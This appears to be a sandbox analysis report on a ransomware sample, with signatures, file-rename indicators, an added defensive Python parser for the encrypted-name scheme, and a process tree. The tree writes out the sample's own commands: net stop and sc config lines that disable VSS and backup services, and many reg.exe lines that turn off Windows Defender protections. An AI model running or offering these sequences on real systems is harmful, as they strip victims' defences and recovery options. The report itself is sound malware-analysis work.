Analysis
- max time kernel: 119s
- max time network: 209s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 12-01-2022 16:51
Static task: static1
Behavioral task: behavioral1
- Sample: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
- Resource: win10-en-20211208
The signatures and process tree below come from the windows10_x64 run (resource win10-en-20211208, i.e. behavioral2).
General
- Target: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
- Size: 2.6MB
- MD5: ca7878f1271bb808e628f7ebb84bcc1f
- SHA1: 8f7713d0519be5c75453b3028ff7baa564fe84c1
- SHA256: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216
- SHA512: 58bf1728467eb32d94be1be4e70d3ca97e0eb21d9fd375d5e567a908ce4a5a2473e4e6e0ebecb57152a4fb6eec137d1a3e843a45cd0eabc1d55f704e42c3a3f4
Malware Config
(none extracted)
Signatures
Each IoC list is capped at 64 rows, so the three signatures reporting "64 IoCs" below are truncated.
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
- MpCmdRun.exe, PID 3628
Modifies security service (2 TTPs, 1 IoC)
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
Start = 4 is SERVICE_DISABLED, so the Defender service (WinDefend) is configured not to start. This reg.exe invocation is not among the children shown in the truncated process tree below.
Clears Windows event logs (1 TTP)
No IoC rows are listed, but three wevtutil.exe instances (PIDs 3676, 3712 and 2256) appear under "Suspicious use of AdjustPrivilegeToken" below, each enabling SeSecurityPrivilege and SeBackupPrivilege, which is consistent with this signature.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
- bcdedit.exe, PID 3164
- bcdedit.exe, PID 1512
PID 3164 also appears in the process tree as net1.exe (stop "UI0Detect"), and PID 3152 as both net1.exe and reg.exe: short-lived helpers exit and the sandbox reuses their PIDs, so correlate on process start time or a process GUID rather than on the PID alone.
Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (all rows: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe):
- File opened for modification: C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm
- File renamed: C:\Users\Admin\Pictures\ExpandReceive.raw => C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm
- File opened for modification: C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm
- File renamed: C:\Users\Admin\Pictures\DenyRegister.crw => C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm
The new name has a fixed shape: the original name (original extension kept), a dot, the 43-character token KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87 (identical on every renamed file in this report), an underscore, a 12-character token that differs per file, and the extension .8zvpm. Because the original name survives intact, it can be recovered from the encrypted name.
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs, list truncated)
Processes: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe (every row is "File opened for modification")
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87__wC6eB5YWEE0.8zvpm
- C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-16_altform-unplated_contrast-black.png
- C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-125.png
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-white_scale-125.png
- C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Spider\ResPacks\gameplayspider.respack
- C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.winmd
- C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-200.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_dcgBmfxmWl00.8zvpm
- C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_C8hEF4maxwY0.8zvpm
- C:\Program Files\Microsoft Office\FileSystemMetadata.xml.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JdLAFUBxR6A0.8zvpm
- C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\28.png
- C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf
- C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-16_altform-unplated_contrast-black.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_o6Id7afySdo0.8zvpm
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YrL2geyrNdQ0.8zvpm
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200_contrast-high.png
- C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_ed4FFgOCwYU0.8zvpm
- C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Apply.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_7BdU5xsWnHE0.8zvpm
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailMediumTile.scale-150.png
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSplashLogo.scale-400.png
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache-Dark.scale-180.png
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-125.png
- C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Square310x310\PaintLargeTile.scale-200.png
- C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\TEE\en-US.PhoneNumber.SMS.ot
- C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Offihub_Base_PriInfo.pri.xml
- C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\office.odf
- C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-white\LargeTile.scale-100.png
- C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-64.png
- C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\TipTsf.dll.mui
- C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_vGlQbTDe_eA0.8zvpm
- C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHM.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_9e4IhdhiV-A0.8zvpm
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\VoiceRecorderSplashScreen.contrast-white_scale-125.png
- C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3899_20x20x32.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_QFvrhcF9rnA0.8zvpm
- C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui
- C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_lpix8Hdz0uM0.8zvpm
- C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\11c.png
- C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png
- C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_l9E0Jab9COg0.8zvpm
- C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml
- C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_rOY6T56VlLw0.8zvpm
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-400.png
- C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\de-DE\rtscom.dll.mui
- C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_11c.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_tGR5Kj9ys-40.8zvpm
- C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_g_TtoKPC3vE0.8zvpm
- C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_f3mmh6fc3Hs0.8zvpm
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-100.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_8IYU2qy_QEI0.8zvpm
- C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_h8pTF9MYoGY0.8zvpm
- C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml
- C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSplashScreen.scale-200.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_eYJru2nTx480.8zvpm
- C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\_Resources\4.rsrc
- C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleSplashScreen.scale-200.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_x2hW4msd8_o0.8zvpm
- C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3569_20x20x32.png
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_mtRDmiY2hfQ0.8zvpm
- C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YkDFdXDizLE0.8zvpm
- C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_RC9Suxq_6jw0.8zvpm
- C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxBlockMap.xml
- C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\shape_hexagon.png
Rows carrying the .8zvpm suffix were renamed as well as opened. For the remaining rows (chiefly WindowsApps package assets and .mui resources) the report records an open for modification but no rename.
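Added example, not part of the sandbox report: a parser for the encrypted-name scheme seen in the "Modifies extensions of user files" and "Drops file in Program Files directory" lists above. It recovers the original path from an encrypted name, checks that the 43-character token is constant and the 12-character token unique per file, and produces a wildcard for hunting other files from the same run. The sample paths are copied from this report; reading the fixed token as a per-victim identifier is an assumption.

```python
import re
from typing import List, NamedTuple, Optional

# Suffix shape seen on every renamed file in this report:
#   <original name>.<43-char fixed token>_<12-char per-file token>.8zvpm
# Both tokens use only [A-Za-z0-9_-]; the fixed token is identical on all of them.
FIXED_TOKEN = "KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87"
ENCRYPTED_NAME = re.compile(
    r"^(?P<original>.+)\.(?P<fixed>[A-Za-z0-9_-]{43})_(?P<perfile>[A-Za-z0-9_-]{12})\.8zvpm$"
)


class EncryptedName(NamedTuple):
    original: str        # path before the rename (the original extension is preserved)
    fixed_token: str     # constant for the whole run; treating it as a victim ID is an assumption
    per_file_token: str  # differs for every file


def parse_encrypted_name(path: str) -> Optional[EncryptedName]:
    """Split an encrypted file name into its parts; None if the path has no such suffix."""
    m = ENCRYPTED_NAME.match(path)
    if m is None:
        return None
    return EncryptedName(m["original"], m["fixed"], m["perfile"])


def hunt_glob(fixed_token: str = FIXED_TOKEN) -> str:
    """Wildcard for 'dir /s' or Get-ChildItem -Recurse -Filter that matches files from this run."""
    return f"*.{fixed_token}_????????????.8zvpm"


def triage(paths: List[str]) -> dict:
    """Separate encrypted from untouched paths and check the two token invariants."""
    encrypted: List[EncryptedName] = []
    untouched: List[str] = []
    for p in paths:
        parsed = parse_encrypted_name(p)
        if parsed is None:
            untouched.append(p)
        else:
            encrypted.append(parsed)
    fixed_tokens = {e.fixed_token for e in encrypted}
    per_file_tokens = {e.per_file_token for e in encrypted}
    return {
        "encrypted": encrypted,
        "untouched": untouched,
        "single_fixed_token": len(fixed_tokens) == 1,
        "per_file_tokens_unique": len(per_file_tokens) == len(encrypted),
    }


# Sample input: paths copied from the IoC lists of this report (a subset, not the full 64).
REPORT_PATHS = [
    r"C:\Users\Admin\Pictures\DenyRegister.crw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_TxBQTdm_CP80.8zvpm",
    r"C:\Users\Admin\Pictures\ExpandReceive.raw.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_JAkYzSEWwxo0.8zvpm",
    r"C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_es.jar.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_C8hEF4maxwY0.8zvpm",
    r"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHM.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_9e4IhdhiV-A0.8zvpm",
    r"C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui",
    r"C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\office.odf",
]

if __name__ == "__main__":
    result = triage(REPORT_PATHS)
    for e in result["encrypted"]:
        print(f"{e.per_file_token}  {e.original}")
    print("untouched:", len(result["untouched"]), "| hunt with:", hunt_glob())
```

Because the suffix has a fixed length, the split is unambiguous even when the original name contains dots or underscores; the per-file token in this report contains both "_" and "-", which is why the character class must include them.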
Launches sc.exe
sc.exe is a Windows utility to control services on the system. Here it is invoked nine times as sc.exe config "<service>" start= disabled, once for each service that was first stopped with net stop (see the process tree), so the services stay down after a reboot.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- vssadmin.exe, PID 3528
Modifies registry class (3 IoCs)
Processes:
- reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
- reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
- reg.exe: Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
EPP is the Windows Defender shell extension behind the "Scan with Microsoft Defender" context-menu entry; deleting it for files, directories and drives removes on-demand scanning from Explorer.
Runs net.exe
net.exe is used nine times as net stop "<service>" /y against SamSs (Security Accounts Manager), SDRSVC (Windows Backup), SstpSvc (Secure Socket Tunneling Protocol), UI0Detect (Interactive Services Detection), vmicvss (Hyper-V Volume Shadow Copy Requestor), VSS (Volume Shadow Copy), wbengine (Block Level Backup Engine), WebClient (WebDAV client) and UnistoreSvc_13373 (the per-user User Data Storage service instance). net.exe hands each command to net1.exe, which is why the pairs appear in the process tree.
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
- powershell.exe, PID 1068 (3 events)
- powershell.exe, PID 3368 (3 events)
- ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe, PID 2224 (2 events)
Two powershell.exe instances are therefore part of the run; their command lines fall outside the portion of the process tree shown below.
Suspicious use of AdjustPrivilegeToken (64 IoCs, list truncated)
Processes:
- wevtutil.exe, PID 3676: SeSecurityPrivilege, SeBackupPrivilege
- wevtutil.exe, PID 3712: SeSecurityPrivilege, SeBackupPrivilege
- wevtutil.exe, PID 2256: SeSecurityPrivilege, SeBackupPrivilege
- wmic.exe, PID 3896: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the privileges with LUIDs 33, 34, 35 and 36 (shown by number only)
- wmic.exe, PID 3532: the same set, recorded twice; the second pass is cut off at the 64-row cap after SeUndockPrivilege
wmic.exe enables every privilege in its token at startup as a matter of course, so the wmic.exe rows are not a signal on their own. The wevtutil.exe rows (SeSecurityPrivilege and SeBackupPrivilege) are what this signature contributes to the event-log-clearing finding above.
Suspicious use of WriteProcessMemory (64 IoCs, list truncated)
These rows record ordinary process creation (the parent writes the child's startup data into the new process, and each spawn produces two events), so they enumerate the spawn tree rather than indicate injection.
Parent PID 2224 (ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe) -> child:
- net.exe: 2776, 3688, 1208, 2004, 652, 4012, 4004, 2832, 3500
- sc.exe: 692, 1436, 896, 2960, 340, 2012, 2932, 1488, 2060
- reg.exe: 1800, 3040, 2132, 3248, 2920 (the later reg.exe children lie beyond the cap)
net.exe -> net1.exe:
- 2776 -> 3152, 3688 -> 1336, 1208 -> 932, 2004 -> 3164, 652 -> 3972, 4012 -> 3604, 4004 -> 1480, 2832 -> 212, 3500 -> 668
Processes
PID 2224   C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe
           command line: "C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"
           signatures: Modifies extensions of user files; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  PID 2776   C:\Windows\SYSTEM32\net.exe   net.exe stop "SamSs" /y   [Suspicious use of WriteProcessMemory]
    PID 3152   C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "SamSs" /y
  PID 3688   C:\Windows\SYSTEM32\net.exe   net.exe stop "SDRSVC" /y   [Suspicious use of WriteProcessMemory]
    PID 1336   C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "SDRSVC" /y
  PID 1208   C:\Windows\SYSTEM32\net.exe   net.exe stop "SstpSvc" /y   [Suspicious use of WriteProcessMemory]
    PID 932    C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "SstpSvc" /y
  PID 2004   C:\Windows\SYSTEM32\net.exe   net.exe stop "UI0Detect" /y   [Suspicious use of WriteProcessMemory]
    PID 3164   C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "UI0Detect" /y
  PID 652    C:\Windows\SYSTEM32\net.exe   net.exe stop "vmicvss" /y   [Suspicious use of WriteProcessMemory]
    PID 3972   C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "vmicvss" /y
  PID 4012   C:\Windows\SYSTEM32\net.exe   net.exe stop "VSS" /y   [Suspicious use of WriteProcessMemory]
    PID 3604   C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "VSS" /y
  PID 4004   C:\Windows\SYSTEM32\net.exe   net.exe stop "wbengine" /y   [Suspicious use of WriteProcessMemory]
    PID 1480   C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "wbengine" /y
  PID 2832   C:\Windows\SYSTEM32\net.exe   net.exe stop "WebClient" /y   [Suspicious use of WriteProcessMemory]
    PID 212    C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "WebClient" /y
  PID 3500   C:\Windows\SYSTEM32\net.exe   net.exe stop "UnistoreSvc_13373" /y   [Suspicious use of WriteProcessMemory]
    PID 668    C:\Windows\system32\net1.exe   C:\Windows\system32\net1 stop "UnistoreSvc_13373" /y
  PID 692    C:\Windows\SYSTEM32\sc.exe   sc.exe config "SamSs" start= disabled
  PID 1436   C:\Windows\SYSTEM32\sc.exe   sc.exe config "SDRSVC" start= disabled
  PID 896    C:\Windows\SYSTEM32\sc.exe   sc.exe config "SstpSvc" start= disabled
  PID 2960   C:\Windows\SYSTEM32\sc.exe   sc.exe config "UI0Detect" start= disabled
  PID 340    C:\Windows\SYSTEM32\sc.exe   sc.exe config "vmicvss" start= disabled
  PID 2012   C:\Windows\SYSTEM32\sc.exe   sc.exe config "VSS" start= disabled
  PID 2932   C:\Windows\SYSTEM32\sc.exe   sc.exe config "wbengine" start= disabled
  PID 1488   C:\Windows\SYSTEM32\sc.exe   sc.exe config "WebClient" start= disabled
  PID 2060   C:\Windows\SYSTEM32\sc.exe   sc.exe config "UnistoreSvc_13373" start= disabled
  PID 1800   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  PID 3040   C:\Windows\SYSTEM32\reg.exe   reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  PID 2132   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  PID 3248   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  PID 2920   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  PID 3808   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  PID 684    C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  PID 3644   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  PID 3664   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  PID 3076   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  PID 1252   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  PID 2144   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  PID 3152   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  PID 1212   C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  PID 640    C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  PID 368    C:\Windows\SYSTEM32\reg.exe   reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
The tree is cut off here by the report. The remaining reg.exe children, and the powershell.exe, wevtutil.exe, wmic.exe, vssadmin.exe, bcdedit.exe and MpCmdRun.exe processes referenced by the signatures above, are not shown.
